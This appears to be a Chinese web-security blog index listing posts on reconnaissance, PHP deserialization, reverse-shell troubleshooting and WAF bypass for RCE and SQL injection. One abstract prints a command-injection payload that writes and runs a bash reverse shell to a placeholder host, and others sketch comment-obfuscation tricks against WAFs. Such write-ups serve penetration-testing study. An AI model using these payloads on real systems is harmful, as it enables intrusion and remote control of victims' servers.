合集-web安全
攻防中的信息收集总结
摘要:1.公司查询 备案号能拿到公司最直接的域名信息 工信部的ICP备案查询系统:https://beian.miit.gov.cn/#/Integrated/recordQuery 爱企查,企查查 收集关系图谱、企业图谱 whois查询 http://whois.chinaz.com/https://w
PHP反序列化总结
摘要:0x01.前言 本文首发于先知:https://xz.aliyun.com/t/12507。 花些时间把四种常见的php反序列化总结了一遍,各自都找了简单示例和例题,参考了一些师傅的链接加上自己的理解,参考链接放在文末 0x02.反序列化是什么 说到反序列化,经常会想到serialize(),uns
反弹shell不成功排查
摘要:反弹不成功排查 今天遇到shell反弹不成功的问题,顺便记下来 0.低权限环境 /tmp写入bash反弹脚本执行 127.0.0.1| Echo ‘bash -i >& /dev/tcp/x.x.x.x/7777 0>&1’>/tmp/1.sh 127.0.0.1|bash /tmp/1.sh ph
bypass waf测试_rce
摘要:前言 以下验证绕过效果都使用开源雷池waf 知己知彼百战百胜,想bypass waf还是得先了解waf waf是什么 WAF(WebApplicationFirewall,WEB应用防火墙)会过滤和监测 Web 应用程序与互联网之间的 HTTP/HTTPS 流量,以此来保护 Web 应用程序安全。它
bypass 安全狗宝塔waf测试_sql注入
摘要:a、关键词替换 混淆 注释/**/和内联注释/!/的利用 注释和内联注释被拦截,可以在注释和内敛注释里添加其他字符增加混淆效果,结合bp爆破找到可绕过的字符,每处地方可能可绕过的字符串都可能不一样,有些语句/////可以绕过,有些语句不可以,得换成//////,所以这时候需要爆破出此处可绕过的字符串
